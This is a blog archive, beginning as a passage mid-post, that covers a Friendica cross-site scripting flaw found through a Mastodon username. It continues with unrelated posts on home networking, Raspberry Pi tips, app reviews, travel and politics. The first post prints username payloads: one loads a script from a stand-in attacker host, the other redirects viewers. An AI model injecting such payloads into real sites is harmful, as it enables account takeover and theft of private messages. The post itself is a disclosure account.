All I had to do to trigger the vulnerability was to get my username to show up on the victim's screen. If I sent them a message, or if any of their friends saw and boosted my message so that it appeared in the victim's timeline, then the trap was sprung.
My little joke was annoying but harmless. A malicious attacker could just as easily change their username to

<script src="https://hackerz.ru/badstuff.js">Hi</script>

The malicious JavaScript could do literally anything with the victim's account that the victim could do. It could look at all their private messages and upload them to another server, or change their password, or message all of their friends, or change their own username to be another bit of malicious JavaScript and start a chain reaction.

That wasn't funny at all. I got up and dashed off an email to Friendica's security email address. I also found that some of the people I'd been talking to via Mastodon were Friendica maintainers, and I messaged them with my concerns.¹ Satisfied that the right people had been notified, I went back to bed.

The next morning I told my wife and kid about the unexpected evening I'd had. My kid instantly piped up with "Dad! Dad! You should change it to a Rickroll!"²

My jaw hit the floor. Yes, of course. It must be done. My amazing wife egged me on by insisting that as it was Mother's Day, I owed this to her. After a little experimentation, I came up with a new username:

<script>window.location="https://is.gd/WVZvnI#TekWasHere"</script>

It was a little longer than the maximum of 30 characters that Mastodon allows you to enter, but since I have direct access to my Mastodon instance's database, it was easy to work around that limit.

I began receiving new messages that I'm pretty sure were all in good humor. Well, somewhat sure.

To their vast credit, the Friendica gang pounced on the problem quickly. Some instances rolled out a preliminary fix later that day. A week after, the team rolled out a new public release so that all other Friendica admins could patch their systems.

It's easy to make a mistake. That's inevitable. The world would be better if everyone reacted like the Friendica maintainers, by asking questions, finding a solution, then quickly fixing those mistakes. Well done.

Because this is how we do it, OK? It's fine to enjoy that moment of discovery, but when you find a broken window, you let someone know so they can fix it. You don't go in. And you never, ever use that knowledge to hurt people. ↩︎
Exact quote from the conversation: “You have the ability to do the funniest thing in history!” That's overselling it, but I appreciated their enthusiasm. ↩︎

Favorite apps: PastePal

Thu, 18 May 2023 19:54:49 +0000

I used to think the Copied clipboard manager for Apple devices was spiffy. I don't know how or why, but that app disappeared from the Internet and the App Stores.

PastePal seems to be its spiritual successor. It works perfectly, it syncs across devices, and the pro version is a one-time, reasonable $15 purchase. It's the only clipboard manager I've found that checks all those boxes.

Pianos.

Tue, 16 May 2023 20:11:09 +0000

I worked as a software developer with a strongly opinionated manager. He believed that we'd achieve Peak Programmer Productivity™️ by standardizing on one common desktop setup. Of course, that meant we'd all be writing Python code in Eclipse or some other similar abomination that he liked that month. This is for him.

From now on, we'll all play the piano. This nonsense of everyone knowing a different instrument is costing us time and money. I've played the piano for years, and I know you're going to like it.

Yes, you too, violinists. Vibrato? In my time as a pianist, I've never needed it.

Drums? A piano is a percussion instrument. How many kinds of percussion do we need? What's that? No, they're not that different. Tempo, rhythms, yes, yes, we'll still have all that.

Huh, woodwinds. Good point. Well, there are more percussion and string players than woodwind...ists, so they can figure something out.

OK, we're getting sidetracked here. Look, this is going to be good for you, too! There are more pianos than violins – yes, and clarinets... what's that? Yes, and probably trumpets, too. Anyway, there are a lot of pianos. The next place you go will probably have a piano, so you'll have a leg up if you ever leave here. Not that you would, am I right? But see, I'm only thinking of your careers.

Yes, I know we're picking my favorite instrument. That's a coincidence. I've looked into lots of instruments, but we can all agree that pianos have certain advantages that... Who threw that? Indoor voices, please! Anyway, I've looked into lots of instruments... no, I haven't ever played a flute, but you'll find that... no, I will not be shoving a piano there, thank you very much!

Alright, meeting's over. Pianos. That's what we're all using, starting — hey, I don't appreciate that language. Let's all act like professional adults here.

Pianos.

eero + Firewalla = perfection

Sat, 13 May 2023 20:08:24 +0000

I built our home Wi-Fi network on eero Pro 6 mesh routers. It's great. I love it. It works as advertised. If your household is like most others, where no one has specific highly technical needs, stop reading this and buy an eero system. I've recommended them to my friends and family with lots of happy feedback.

However, our needs are specific and highly technical. Making and fixing computer networks is a significant chunk of my job. Information security is another huge chunk of it. We host servers in our house. And soon, our ISP¹ will upgrade our Internet connection from 1Gbps to 10Gbps. eero has a few issues that complicate these uses:

A persistent DHCP bug gives out the gateway eero's own IP as a DNS server (where it acts as a proxy), even if I configure custom DNS servers. This means that when I had a Pi-hole, most requests appeared to come from the eero itself and not the individual devices. Forget applying custom blocking policies to specific devices because there's no way to distinguish them.
Hairpin NAT regularly breaks. If a device uses DNS to connect to a machine behind the eero gateway, say with Plex on an iPad configured to watch videos stored on a home server, it often works when I bring that device home and connect it to the same Wi-Fi as that server. For a while, at least. And then it won't until I remembered to reboot the whole network.
The eero Pro 6 unit only has gigabit Ethernet jacks. If your Internet connection is faster than that, too bad. The newer eero Pro 6E units have single 2.5Gbps Ethernet jacks, which is almost worse. Although the gateway eero itself can have a 2.5Gbps Internet connection, it can't share the full speed of that connection with any other device.
Its firewall settings are limited. I can either allow all remote hosts to connect to a specific port on an internal server, or not allow any hosts. I can't define rules like "allow connections to port 8080 from host A.B.C.D", or "block connections from North Korea". In practice, this means I have to set the eero to allow all traffic, then configure another firewall app on my server to enforce more tailored rules.

Enter the Firewalla Gold Plus. It's a freestanding firewall device with 4 2.5Gbps Ethernet jacks, and a phone (and web!) user interface that is as easy to use as eero's. I've plugged the Firewalla directly into our Internet connection, and the eero gateway plugs into the Firewalla. I put the eero network into bridge mode so it only has to handle the Wi-Fi mesh network. The Firewalla assumed all routing and firewall duties. The setup works perfectly:

Firewalla's DHCP is more configurable and works correctly. Its DNS incorporates a lot of Pi-hole's functions like ad blocking and local DNS.
Hairpin NAT works perfectly, or at least it hasn't broken yet in the few weeks since we got the device. I can connect to myserver.example.com from my living room as easily as from Starbucks without reconfiguring anything when I travel between those networks.
I don't have the equipment to test Firewalla's highest throughput yet. The box could max out at 1.1Gbps for all I could prove today. However, I doubt it. I can run benchmarks that pass 1Gbps of traffic in through 1 port and out through another without effort. Even if the Firewalla could only pass exactly 2.500Gbps through to the Internet connection, that would allow devices connected to the eero gateway to download at its current full 1Gbps speed while the new, separate wired LAN is also pulling another 1.5Gbps through it. For future improvement, it can bond pairs of Ethernet ports together to act as 5Gbps ports. That's not the top speed of the 10Gbps Internet connection, but it's faster than any devices I own today.
The firewall settings are vastly more sophisticated. I can open inbound ports to specific IPs or subnets, named groups of hosts, or geographical regions. I can also block outbound connections. And unlike with eero, I get a detailed report of blocked and allowed connections.

If I didn't host a home server, or if I weren't quite so super-nitpicky about security settings, or if our brilliant ISP wasn't upgrading our connection from "hella fast" to "that's just ridiculous", our eero network would be fine as-is. I still happily recommend it to everyone I know. And despite my few complaints, I didn't need to add a Firewalla to our working system. That said, I'm happy I did. It elevated our already excellent little network to blissfulness.

If you live somewhere with Sonic Internet access, get it. Their service is fast, inexpensive, reliable, doesn't have data caps, and supports net neutrality. ↩︎

Wake up, little sunshine

Fri, 05 May 2023 09:12:05 +0000

I prompted ChatGPT with: "Write a song I can sing to my son to get him awake and moving to get ready for school."

It replied with:

Verse 1
Wake up, little sunshine
There’s a new day dawning
You’ve got a big adventure
It’s time to get moving

Chorus
Rise and shine, let’s go to school
Time to learn, time to grow
Put on your shoes, grab your bag
You’re ready to go

Verse 2
Stretch out your arms and legs
Take a deep breath and smile
You’ll make new friends today
And learn so much in a while

Chorus
Rise and shine, let’s go to school
Time to learn, time to grow
Put on your shoes, grab your bag
You’re ready to go

Bridge
The world is waiting for you
To see all that you can do
So let’s start this day together
And make it great, no matter the weather

Chorus
Rise and shine, let’s go to school
Time to learn, time to grow
Put on your shoes, grab your bag
You’re ready to go

Outro
Wake up, little sunshine
It’s time to start your day
With a bright new adventure
You’ll find your own way.

Said son, who is 15, seemed to appreciate me waking him up by belting this out in full operatic tenor. I'm almost sure of it, despite any shouting to the contrary.

The Internet is a rough neighborhood

Fri, 28 Apr 2023 22:23:44 +0000

This week I stood up a new firewall in front of my home network. This one has much better logging than the old one, and I've been watching the block reports.

A screenshot of blocked inbound connection attempts, originating from all over the world.

Real talk, friends: DO. NOT. expose a machine to the open Internet unless you're 100% confident it's bulletproof.

"I run my service on a custom port!" Doesn't matter.

"I use IPv6!" Doesn't matter.

"I'm just a nobody!" Doesn't matter.

Practice safer networking, every time, all the time.

Fox News fired Tucker Carlson

Mon, 24 Apr 2023 16:54:39 +0000

However it's spun, Fox News fired Tucker Carlson. Carlson had the most popular cable news show by a wide margin, and it's inconceivable that Fox would simply "part ways" with their highest earner, with zero notice, without cause.

Hint: it's never good to cost your employer a billion dollars — not that Carlson is the only miscreant at Fox.

Integrate Things with Focus

Tue, 18 Apr 2023 19:06:01 +0000

I use the Things task manager to keep track of what I need to do. I use the Focus pomodoro timer to help myself focus on a task that I'm actively working on.

Focus integrates well with another task manager, OmniFocus: you can drag an action from OmniFocus into Focus to create a task to work on, and that task will have a button that links back to the original OmniFocus action. Super convenient! It doesn't play well with Things, though. If you try the same process, you'll end up with multiple separate actions for each of the Things to-do's various properties.

For example, this to-do has the title, note, checklist, tags, when, and deadline options filled in:

A Things to-do with lots of options set

Dragging it to Focus creates a whole mess of random tasks:

Focus with 8 unrelated tasks

That's not helpful. We can do better.

First, I wrote a shortcut using Things's shiny new Shortcuts actions. For each to-do currently selected in Things, it uses Focus's URL scheme to create a Focus task with the item's title, notes, and due date, and a link back to the item in Things.

Second, I made a Keyboard Maestro hot key macro, available only in Things, that executes my shortcut. When I select the to-do item above and press "option-F", I get one single task with all the details set:

Focus with 1 well-configured task

If I click the link icon next to the task's title, Things opens with that to-do selected.

Ta-da! The workflow is slightly different than with OmniFocus, but only a little bit, and the result is just as useful.

Apple won't totally block unwanted emails

Thu, 23 Mar 2023 21:33:01 +0000

Apple's email apps and services don't allow users to completely block senders. If someone is sending you messages you don't want to receive, tough. You're going to get them.

The iCloud.com website's Mail app doesn't have a sender block mechanism. Instead, it offers a way to create rules based on each message's attributes, such as its sender. Rules support these actions:

Move to Folder
Move to Trash
Forward to
Mark as Read
Move to Folder and Mark as Read
Move to Trash and Mark as Read
Forward to an Email Address and Mark as Read

None of those actions are the same as bouncing or silently discarding an email. At most, you can have the email sent to your Trash folder.

Mail.app on a Mac allows you to mark senders as "blocked". You can configure Mail.app's junk mail filters to either "Mark [their message] as blocked mail, but leave it in my Inbox" or "Move it to the Trash". Again, you can't bounce or discard it.

I tried to be clever and write an AppleScript program to delete messages from my Mac's Trash folder. That was a dead end because AppleScript's idea of deleting an email is moving it to Trash, even if it's already in there. Neither does it offer a way to automatically empty the trash.

Apple, this is disappointing. If I'm blocking someone, I don't want to hear from them at all, ever. It's not enough to send their messages to the Trash folder. I don't want them to be in my email account at all.

Upgrade your Raspberry Pi with an SSD

Mon, 20 Mar 2023 19:11:26 +0000

I upgraded my Raspberry Pi to use an external SSD drive instead of its built-in SD card reader. If you use your little computer for anything non-trivial, so should you.

For boring old dd sequential reads, the SSD is several times faster than the SD card:

# dd if=/dev/mmcblk0 of=/dev/null bs=1M count=1000
1000+0 records in
1000+0 records out
1048576000 bytes (1.0 GB, 1000 MiB) copied, 24.8316 s, 42.2 MB/s

# dd if=/dev/sda of=/dev/null bs=1M count=1000
1000+0 records in
1000+0 records out
1048576000 bytes (1.0 GB, 1000 MiB) copied, 3.4034 s, 308 MB/s

That's probably not enough to be worth bothering with, though. I'd guess that most people who need high throughput have either come to this conclusion on their own, or weren't using a Raspberry Pi anyway.

An SSD make an enormous difference when multiple processes are trying to write at once. This happens on real-world systems when running routine maintenance tasks like apt-get upgrade, and seeing other jobs freeze up while waiting their turn to write to disk.

I used sysbench to simulate concurrent random IO workloads. The sequential writing "prepare" step is proportionally faster on the SSD:

/tmp/sdcard-bench$ sysbench fileio prepare
sysbench 1.0.20 (using system LuaJIT 2.1.0-beta3)

128 files, 16384Kb each, 2048Mb total
Creating files for the test...
Extra file open flags: (none)
Creating file test_file.0
Creating file test_file.1
Creating file test_file.2
...
Creating file test_file.125
Creating file test_file.126
Creating file test_file.127
2147483648 bytes written in 120.50 seconds (17.00 MiB/sec).

/tmp/ssd-bench$ sysbench fileio prepare
...
Creating file test_file.127
2147483648 bytes written in 30.82 seconds (66.45 MiB/sec).

That's a nice bump, but I wouldn't have gone through the trouble for that alone. The testing stage looks much different. Here's the SD card's benchmark:

/tmp/sdcard-bench$ sysbench fileio --file-test-mode=rndrw --threads=10 run
sysbench 1.0.20 (using system LuaJIT 2.1.0-beta3)

Running the test with following options:
Number of threads: 10
Initializing random number generator from current time


Extra file open flags: (none)
128 files, 16MiB each
2GiB total file size
Block size 16KiB
Number of IO requests: 0
Read/Write ratio for combined random IO test: 1.50
Periodic FSYNC enabled, calling fsync() each 100 requests.
Calling fsync() at the end of test, Enabled.
Using synchronous I/O mode
Doing random r/w test
Initializing worker threads...

Threads started!


File operations:
    reads/s:                      81.51
    writes/s:                     53.74
    fsyncs/s:                     283.74

Throughput:
    read, MiB/s:                  1.27
    written, MiB/s:               0.84

General statistics:
    total time:                          11.0830s
    total number of events:              3367

Latency (ms):
         min:                                    0.01
         avg:                                   32.51
         max:                                 1929.04
         95th percentile:                      155.80
         sum:                               109474.32

Threads fairness:
    events (avg/stddev):           336.7000/23.91
    execution time (avg/stddev):   10.9474/0.30

And the SSD's:

/tmp/ssd-bench$ sysbench fileio --file-test-mode=rndrw --threads=10 run
sysbench 1.0.20 (using system LuaJIT 2.1.0-beta3)

Running the test with following options:
Number of threads: 10
Initializing random number generator from current time


Extra file open flags: (none)
128 files, 16MiB each
2GiB total file size
Block size 16KiB
Number of IO requests: 0
Read/Write ratio for combined random IO test: 1.50
Periodic FSYNC enabled, calling fsync() each 100 requests.
Calling fsync() at the end of test, Enabled.
Using synchronous I/O mode
Doing random r/w test
Initializing worker threads...

Threads started!


File operations:
    reads/s:                      1535.98
    writes/s:                     1023.49
    fsyncs/s:                     3402.13

Throughput:
    read, MiB/s:                  24.00
    written, MiB/s:               15.99

General statistics:
    total time:                          10.1136s
    total number of events:              59047

Latency (ms):
         min:                                    0.01
         avg:                                    1.69
         max:                                   14.35
         95th percentile:                        4.03
         sum:                                99904.56

Threads fairness:
    events (avg/stddev):           5904.7000/29.24
    execution time (avg/stddev):   9.9905/0.00

The SSD card is approximate 20 times faster than the SD card, and the SD card's maximum latency is about 140 times higher than the SSD's. In normal operation, this has an enormous effect on usability. It's the difference between the system slowing down a little during intensive operations, and everything hanging for seconds at a time.

I wish I'd done this sooner.

A Boston Terrier Married a Cat

Fri, 17 Mar 2023 18:54:03 +0000

I prompted ChatGPT: “Write a Shakespearean sonnet about a Boston terrier marrying a cat.”

It replied:

"Oh, wondrous sight! A terrier and cat
In love, declaring bonds that none can break
Though some may scoff, and others may bark flat
Their love is true, not just a mere mistake

The terrier, bold and loyal as can be
Protects his feline bride with all his might
And she, with purrs and nuzzles, shows with glee
That this odd couple won't give up the fight

They nap together, groom each other's fur
And playfully chase one another around
To some, their pairing might seem quite absurd
But their love for each other knows no bound

So let them wed, and let their love be strong
For true love, no matter who, can't be wrong"

Our inevitable robot overlords can write delightful poetry. We're in trouble.

Easily copy file contents with ForkLift

Fri, 24 Feb 2023 20:46:19 +0000

I use the ForkLift 3 file manager on my Mac. Part of my job involves copying-and-pasting the contents of various files into web forms. I made a trivial little shell script so ForkLift can help me:

#!/bin/sh

if [ ${#@} -ne 1 ]; then
    echo "Expected exactly 1 filename."
    exit -1
fi   

pbcopy < $1

Then I created a new "Tool" called "Contents to Clipboard" that calls the script with the name of the selected file.

/Users/me/bin/copy_contents.sh $SOURCE_SELECTION_PATHS

Now I can select a file, select the Commands > Contents to Clipboard menu, and voila! The file's contents are ready to be pasted into another app.

Recovering a Raspberry Pi password on an M1 Mac

Mon, 20 Feb 2023 20:03:21 +0000

I would never accidentally change my Raspberry Pi's account password before clicking "save" in my password manager, therefore locking myself out. But let's say, hypothetically, that I did. How would I get back into my account?

The process would look like:

Power off the Raspberry Pi.
Eject its SD card.
Put the SD card in my M1 Mac.
Magically replace the Pi's /etc/shadow file with the previous /etc/shadow- version, undoing the password change.
Put the SD card back in my Pi.
Power up, log in, and pat myself on the back.

Hypothetically, that magic bit could be a pain in the neck.

False start #1: ext4fuse

The relevant part of the Pi's SD card is formatted with the ext4 filesystem. macOS doesn't natively support ext4, and I'd need to install software so that I could access and edit the files on the card.

First, I'd install the open source ext4fuse program and navigate to the Pi's /etc directory. Only then would I realize that ext4fuse is a read-only filesystem and doesn't support writing at all.

False start #2: extFS for Mac

If the open source option didn't work, I'd try the paid extFS for Mac filesystem and use its trial offer to do the work.

After installation, I'd discover that something in the way that the Pi formats its SD card prevents extFS from mounting it.

False start #3: run Debian in a VirtualBox VM

I bet by then I'd give up on mounting the filesystem inside macOS, and accept that it'd be easier to do the work inside a Linux VM. I'd likely hold my nose and download Oracle's VirtualBox. Bummer that it doesn't work well on M1 Macs yet, which I'd learn would cause the Debian installer to reboot every couple of minutes.

Success at last: Parallels Desktop

After trying and ruling out everything else, I'd probably try the trial version of Parallels Desktop. I'd use it to install Debian, then go to the Devices > USB & Bluetooth > Apple SDXC Reader Media (disk6) menu to mount the Pi's SD card inside the VM. Then I'd open the VM's Terminal app and run:

cd /media/parallels/root/etc
sudo mv shadow shadow.bak
sudo cp shadow- shadow

Finally, I'd go into the VM's Files app and unmount the "boot", "root", and "SETTINGS" disks.

Crossing my fingers

After all that, I'd pop the card out, stick it back in the Raspberry Pi, boot it, log in via SSH, and run sudo -s. At the password prompt, I'd type my original password (as stored in my password manager), then exhale in relief as I was once again able to log in.

That is, if I were to lock myself out in the first place. Which I never would. Because I'm a professional.

I watched the Tyre Nichols video

Sat, 28 Jan 2023 19:33:18 +0000

I watched the Tyre Nichols video. I didn't want to because I knew what it was going to contain and dreaded the idea of seeing it, but I felt obligated to. A man died at the hands of the authorities, and as a citizen, I should witness what our government is doing. Even if — especially if — that government is accused of committing horrible acts.

I'm not glad I saw it. I wish I could un-see it. I don't resent anyone else who doesn't want to see it. There's no lesser way to describe it: Demetrius Haley, Tadarrius Bean, Emmitt Martin III, Desmond Mills Jr., and Justin Smith murdered Nichols. Yes, he initially ran from the traffic stop. He should not have done that. But running from a traffic stop is not and should not be a capital offense that warrants the death penalty. After the officers had him safely detained, they proceeded to tase, pepper spray, kick, punch, and use a baton to beat him to death while he called for his mom. Anyone who claims to have seen that video and says that he deserved it or defends the officers' actions in any way is either lying about seeing it, an irredeemable bootlicker, or a sociopath.

I grew up with the privilege of not fearing the police. Sure, I didn't want them around if I was getting up to mischief, but I believed the worst that could happen was that they'd catch me and a court would punish me for it. Nichols didn't have that privilege. He was right to be afraid of his police, and although it's easy for me to say that he shouldn't have run from them, it turned out that his fears were justified.

My travel project template

Fri, 13 Jan 2023 21:22:33 +0000

In an older post, I talked about making a project template for trip planning. The goal is to build a comprehensive list of everything I might want to prepare, pack, or do before, during, or after a business or vacation trip. Before I made this template, I was more anxious: Did I forget to do anything? Do I have everything I need? What am I missing? Now I can relax and concentrate on the fun times ahead.

Friends have asked me for my list to use as a starting point for their own, and this is that lightly annotated list. Regrets from past adventures inspired every item. The moment I've booked a trip, I copy this template into my to-do app, then delete everything that doesn't apply this time. For instance, if I'm going to visit family, I can use their pillow instead of packing my own. If I'm going to Chicago in winter, I don't need swimming trunks. If I'm traveling for personal reasons, I may not take my work laptop. It's much easier to remove items I don't need than to scramble to remember the things I do need.

As always, the "update the travel template" action near the bottom is the critical feedback loop that makes this all work. Every time I've wished I'd done or packed something, I made a reminder to add it to the list for the next time. If I were to start over with a new template having that as the only item, after a few trips that template would look a lot like this one.

As soon as travel is planned

Schedule time off at work ¹

Call the vet to make pet boarding arrangements

Three weeks before travel

Ensure airline has TSA Pre✓ info

One week before travel

Notify the bank about travel ²

Buy travel toothpaste

Buy disposable razors

Buy travel shaving cream

Two days before travel

Get passports from safe

Check in to flight

Get $40 from an ATM ³

Download reading material ⁴

Stop eating spicy food ⁵

Day before travel

Charge the USB battery ⁶

Pack pants

Pack shirts

Pack undershirts

Pack underwear

Pack socks

Pack shoes

Pack jacket

Pack sandals

Pack shorts

Pack belts

Pack a wearing-around hat ⁷

Pack swim trunks

Pack a sun hat

Pack a sun shirt

Pack gaffers tape ⁸

Pack water bottle

Download podcasts and meditations ⁹

Pack dopp kit ¹⁰

$20 bill

Brush/comb

Hair gel

Deodorant

Bottle of shampoo

Bar of soap

Razor

Shaving cream

Toothbrush

Toothpaste

Floss

Lip balm

Nail clippers

Sewing kit

Safety pins

Curtain clips ¹¹

Eye lotion

Meds and vitamins

Q-tips

Eye drops

Gold Bond powder ¹²

Pack first aid kit

Band-aids

Blister bandages ¹³

Ibuprofen

Melatonin ¹⁴

Allergy meds

Indigestion medicine

Night before travel

Put passport card in bag

Put backup credit card in bag ¹⁵

Set wake-up alarm

Charge laptop

Charge iPhone

Charge iPad

Charge Apple Watch

Charge AirPods

Charge Switch

Remove TSA-unfriendly stuff from bag ¹⁶

Pack USB battery

Pack passport book in suitcase ¹⁵

Pack handkerchief

Pack food bar

Pack AirPods

Pack Switch

Pack magazine for plane ⁴

Pack boarding passes

Pack sunglasses

Pack journal

Day of travel

Wear my Apple Watch

Turn on Fog of World ¹⁷

Set the thermostat to vacation mode ¹⁸

Pack laptop charger

Pack iPhone charging cable

Pack iPad charging cable

Pack Apple Watch charging cable

Pack USB charger's charging cable

Pack AirPods charging cable

Pack multi-device charger

Pack laptop

Pack iPhone

Pack iPad

Pack pillow

Buy airport stickers ¹⁹

The day before return

Check in to return flight

The day of return

Buy airport stickers

Set the thermostat to normal mode

Put away passports

Update the travel template ²⁰

After return

Submit travel reimbursement request ²¹

Look for travel reimbursement check ²²

This seems obvious but I always forget. ↩︎
If you don't do this, your bank may see transactions from an unusual location and freeze your debit or credit card. ↩︎
I've never regretted having walking around money while traveling. ↩︎
If I didn't have something to read on a flight, I'd lose my mind. ↩︎ ↩︎
Yes, the Thai curry native-extra-hot is delicious. Do you really want to be trapped in a plane while your stomach tries to digest it? ↩︎
I take a plug-in charging block and a portable USB battery. If my phone is running low in the middle of a long flight, I can still charge it with the battery. ↩︎
It's vacation. I want to throw on a hat to step out for coffee or breakfast. ↩︎
Ideal for covering obnoxiously bright power LEDs in hotel rooms, blocking light under the door, etc. ↩︎
If it's too bumpy to read, it's nice to have something fun or relaxing to listen to. ↩︎
See "Building the Perfect Dopp Kit". ↩︎
Hotel curtains never seem to close all the way. Bend them to your will. ↩︎
Ever been rained on, had to walk around a lot in wet pants, and gotten chafed from it? Yeah, me neither. ↩︎
"Ow, these new shoes are killing my feet and I'm walking way more than usual." ↩︎
Jet lag. Strange hotel. Travel excitement. These add up to difficulty sleeping. ↩︎
Carry at least 2 forms of ID and 2 forms of payment in 2 separate places. If 1 set gets stolen, you still have the other to get home. ↩︎ ↩︎
I have a tiny multi-tool in my EDC bag, and I don't want the TSA to confiscate it. ↩︎
This is a fun little app that records everywhere you've been. ↩︎
Save money not heating or cooling your house as much while you're away from it. ↩︎
I collect them for my carryon suitcase. This is in here twice in case I have a different layover on the way home. ↩︎
I take notes of things I wish I'd done or packed. When I get home I immediately update the list so that I won't forget next time. ↩︎
Do it while you still have all the receipts in one place. ↩︎
Once the office has reimbursed me, the trip is officially done. ↩︎

Muradin wallet doesn't block RFID

Thu, 05 Jan 2023 19:03:45 +0000

My wife bought me a cool Muradin RFID-blocking wallet for Christmas. I like it a lot, except for the fact that it doesn't actually block RFID if you use it as advertised.

The wallet has a roomy inside "cage" for storing cards, and an external pocket for storing your "frequently used card":

That's not just my interpretation of the photo. The site goes on to explicitly say that the outside pocket is for your card:

But what does our handy dandy Flipper Zero think of the wallet's claim? Not much. It had no trouble reading the numbers off my debit card in the "FUC exterior pocket":

To see if orientation mattered, I rotated my card 180º and tried again. It didn't matter:

I went on to test with single cards inside the inner compartment. If the card was against the back of the wallet, as far as possible from the protective flap, the Flipper Zero couldn't detect it.

If the card was on top of some non-RFID contents, like a few folded dollar bills, so that it was about halfway down inside the inner compartment, I could tell with about 90% reliability whether the card was a Visa or American Express:

If the card was on top of several pieces of non-RFID content, and pushed up to the top of the inner compartment, I could scan its number through the "RFID-blocking" wallet about 50% of the time, depending on the card.

This wallet doesn't work. Its RFID-blocking claim is somewhere between misleading and an outright lie. Don't buy it.

Happy 2023!

Sun, 01 Jan 2023 18:52:26 +0000

2022 was a whirlwind of disasters, plagues, wars, elections, recession, inflation, and other stressors. It was a challenging year. If it had a theme, it would be "oh, now what?" However, we survived it, even if bruised and scarred.

This year is going to be better. I know it.

Happy 2023!

SteerMouse makes my Logitech mouse better

Thu, 08 Dec 2022 11:24:38 +0000

I bought a Logitech MX Vertical Wireless Mouse last year. The mouse itself remains delightful and my carpal tunnel aches have disappeared. I'm a fan.

Logitech's "Options" (and newer "Options+") driver software isn't as lovely. Besides its odd issues, such as old versions being incompatible with FileVault, it's a "large" app for something that mainly maps button presses to actions. It has a jarring, non-Mac-like interface, and supports a lot of features I'll never use.

Enter SteerMouse. Let's get the price out of the way: yes, I'm talking about a $20 app to replace the free one that comes with my mouse. It's worth it. SteerMouse only configures the mouse speed, button-to-action mapping things, and other directly mouse-related settings, and it does it well. It's installed as a System Settings pane, looking and feeling almost like it shipped with the computer. Unlike Options, it doesn't like to call home to its maker (thanks, Little Snitch!), and it lets me map the top button to a helpful action (instead of using it to switch between 2 speed settings, which I never once did).

In short, buy it. It's better, lighter, more native, and more private than Logitech's software. Even at $20, I recommend it.

Audrey Auden's "The Voice in All"

Wed, 30 Nov 2022 16:35:26 +0000

I read Audrey Auden's new book, "The Voice in All", the first in her new "The Artifex and the Muse" series. Auden creates a lush, complex world filled with interesting, multifaceted residents. Tantalizing glimpses of science fiction sneak into the fantasy setting, hinting at a rich universe for the rest of the series. "The Voice in All" packs a surprising amount of development and story into a quick, fun book. Auden's piqued my interest and I'm looking forward to the next installments.

Easily delete your Twitter account the hard way

Sun, 20 Nov 2022 10:02:00 +0000

The folks at Conscious Digital have a nifty website, yourdigitalrights.org, that makes it easy to file a CCPA or GDPR request asking a website to remove all of your data.

In particular, they make it easy to delete all your Twitter data.

Delete your account, regain your privacy, and cause someone an administrative hassle with a single click. It’s perfect!

Of course dogs smile

Sun, 02 Oct 2022 23:29:21 +0000

I hang out on parts of the Internet where people often post pictures of happy animals. All too often, someone will share a photo of their smiling pooch, and a viewer who wants to sound smart will feel obligated to add a comment like "dogs can't smile." Their arguments reduce to one of several claims:

Statement: They're not smiling. They're using the muscles in their face to pull the corners of their lips up.

Rebuttal: Yes, that's how smiling works. You've just described the physical act of smiling.

Statement: Dogs do that to show fear or nervousness.

Rebuttal: Perhaps it can also mean that, but when my dog snuggles up against me and I gently pat her head, she's not exactly terrified.

Statement: That's an automatic response to scratching or patting them in specific places.

Rebuttal: When I scratch those spots, it feels good and they smile. Got it.

To most dog owners, the notion that a dog can't smile is as laughable as telling a cat owner that their fuzzy pets can't purr. They can. Lots of happy dogs do this all the time. And while cats can be notoriously finicky, dogs can be thrilled when you say their name or look at them. We've bred them for thousands of years to be friendly and sociable. The smile-doubters have somehow never managed to make a dog — a dog! — happy to have them around.

I pity those people but also distrust them. What does every dog in their life know about them that we don't?

California 2022 Midterms Voting Guide

Thu, 29 Sep 2022 21:54:42 +0000

These are my recommendations for the November 8, 2022 midterm election in California.

Propositions

Direct democracy looks like a great idea on paper. In practice, we end up with awful laws like Prop 8. Because it's so hard to remove bad propositions once they're approved, it's better to vote "no" on ballot propositions you're unsure about. If it's a great idea — or even a bad one, in the case of Prop 29's predecessors — the proposers can try again in a later election. You can always choose to approve it next time.

Proposition 1 — Reproductive Freedom

Yes. Explicitly protect abortion rights at the state constitution level.

Proposition 26 — Casino Sports Betting

No. This isn't so important that we need to write it into law.

Proposition 27 — Online Sports Betting

No. This isn't so important that we need to write it into law. Note that some advertising makes it sound like you have to pick one of Prop 26 or Prop 27. That's untrue, and you can vote "no" or "yes" to either, both, or neither, as you wish.

Proposition 28 — School Arts

Yes. California has decent support for STEM education. We should also support creative arts. We have a record budget surplus and should invest in all our students.

Proposition 29 — Dialysis Clinics

No, and stop asking. This terrible idea keeps arising every couple of years. We've said repeatedly that we don't want to enshrine this mistake into the California constitution, and we still don't.

Proposition 30 — Electric Vehicle Subsidies

No. I'm ambivalent. When in doubt, say "no".

Proposition 31 — Enforce the Flavored Tobacco Bans

Yes. The tobacco industry worked to block enacting a widely supported law that would make it harder for them to market "fun" vape flavors to kids. California has already chosen this legislation. Now let's defeat Tobacco's efforts to stop it.

Winding down

Fri, 16 Sep 2022 17:26:00 +0000

I knew the conversation wouldn't be easy when the veterinarian asked if this was a good time to talk.

I still think of her as a puppy, even though she hasn't been one for many years. People are surprised to find that this tiny little dog is a full-grown adult. Although she's shaped like a miniature version of the real thing, it's hard to wrap your brain around something that small being anything other than a baby.

The years don't care about her appearance, or that she sometimes sleeps on my pillow next to my head, or that I remember how frisky she use to be. Even little bits wear out and start to fail. As her vet translated the numbers from the lab results into things I could understand, I began to realize what they meant: my wife and I will have to make difficult decisions soon.

It's hard to know what's best for her, and harder yet to separate that from what's easiest for us. Those aren't at all the same things. If I could throw the finite resources available to us at the problem and put it off forever, I would. But that's not how time works. We can delay things, but only for so long. And the delay has its costs. The analytical part of my brain imagines that she has a fixed amount of happiness left. Do we let her spend it all and then lay down for a last nap, or do we spread it over years (or maybe just months, who can tell) of uncomfortable treatments and procedures? I don't know. And not deciding is the same as deciding: time won't give us the luxury of pausing until we can choose what's right.

My heart knows that this is tougher because of how much we love her. If these sorts of decisions were easy, that would be sad in a different way. Many years ago, we came to care so much about our little puppy that it made the inevitable so painful, but I wouldn't change that even if I could. And until then, I'm going to make her remaining time as happy as I can.

Surprise eero hardware end-of-life

Tue, 06 Sep 2022 16:21:00 +0000

Amazon is ending software support for 1st generation eero devices at the end of September 2022. That's fine. You can't support old hardware forever, and five years is a decent run.

